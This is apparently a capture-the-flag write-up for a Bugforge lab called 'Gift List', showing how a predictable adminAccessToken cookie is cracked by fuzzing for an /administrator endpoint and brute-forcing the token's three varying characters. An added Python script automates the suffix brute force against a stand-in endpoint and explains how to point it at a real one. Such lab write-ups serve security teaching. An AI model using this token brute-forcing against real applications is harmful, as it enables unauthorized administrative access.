Gift List
This was the second time yours truly had the chance to host a lab on Bugforge. This time there was a cookie that needed some brute forcing.
When we log in, the first obvious thing we see is that the server hands out an adminAccessToken. Strange, but OK, why not.

Considering there is an adminAccessToken, that must mean there is an admin endpoint, right?
The best thing we can do now is fuzz the application for it.

That's why /admin didn't work: the endpoint is /administrator. Unfortunately, we get an access denied. When we go to the frontend, we see what we feared: the adminAccessToken we were handed isn't valid for the admin endpoint. So let's investigate that token. We send the login request to Sequencer and let it do its magic.

Sequencer tells us that only the last three characters change, and checking a few tokens manually confirms this. So now we go to Intruder and brute force the token.

With the brute force, you'll see that the suffix rls gives a different response length.
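The two steps above, scripted, as an added example that is not part of the original writeup: first work out which token positions vary across a sample (what Sequencer's per-position analysis reports), then enumerate every suffix for the fixed prefix and flag the one whose response length differs (Intruder's signal). The sample tokens are constructed, `fake_administrator()` stands in for the lab's /administrator endpoint, and the admin suffix `rls` is taken from the text; none of this is the lab's real data.

```python
"""Added example: analysing adminAccessToken values and brute-forcing the varying
suffix. Tokens here are constructed, and fake_administrator() is a stand-in for
the real /administrator endpoint."""
from collections import Counter
from itertools import product
import string

# Constructed sample of tokens as a login endpoint might hand them out:
# the first twelve characters never change, only the last three do.
SAMPLE_TOKENS = [
    "7c3e91ab4d0fqkz",
    "7c3e91ab4d0fmwa",
    "7c3e91ab4d0fbtp",
    "7c3e91ab4d0fxhe",
    "7c3e91ab4d0fnlc",
]

# Assumption: the varying part only uses lowercase letters, as in the sample.
ALPHABET = string.ascii_lowercase

# Assumption: the admin's token ends in the suffix the writeup reports.
ADMIN_SUFFIX = "rls"


def varying_positions(tokens):
    """Return the character positions that differ across the sampled tokens."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("all sampled tokens must have the same length")
    return [i for i in range(length) if len({t[i] for t in tokens}) > 1]


def fixed_prefix(tokens):
    """The constant part of the token; everything after it has to be brute-forced."""
    positions = varying_positions(tokens)
    first_var = min(positions) if positions else len(tokens[0])
    return tokens[0][:first_var]


def fake_administrator(token):
    """Stand-in for GET /administrator with the token in the cookie: a short
    denial for every token except the admin's, which gets a longer page."""
    if token == fixed_prefix(SAMPLE_TOKENS) + ADMIN_SUFFIX:
        return "<html><body><h1>Gift List admin</h1><p>Welcome back.</p></body></html>"
    return "Access denied"


def brute_force_suffix(prefix, suffix_len, alphabet, request):
    """Try every suffix of suffix_len characters appended to prefix, sending each
    candidate through request(), and return the suffixes whose response length
    differs from the most common one (the outlier Intruder shows)."""
    lengths = {}
    for combo in product(alphabet, repeat=suffix_len):
        suffix = "".join(combo)
        lengths[suffix] = len(request(prefix + suffix))
    common_len, _ = Counter(lengths.values()).most_common(1)[0]
    return sorted(s for s, n in lengths.items() if n != common_len)


if __name__ == "__main__":
    prefix = fixed_prefix(SAMPLE_TOKENS)
    n_var = len(varying_positions(SAMPLE_TOKENS))
    print("fixed prefix:", prefix, "varying chars:", n_var)
    print("outlier suffixes:", brute_force_suffix(prefix, n_var, ALPHABET, fake_administrator))
```

Against a real target, `request()` would be a function that sets the cookie and returns the body of the /administrator response; keying on length rather than on an exact string is what lets the outlier stand out without knowing what the admin page looks like in advance.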
When we now put that adminAccessToken in our cookie and refresh the page, we get the flag 🇧🇪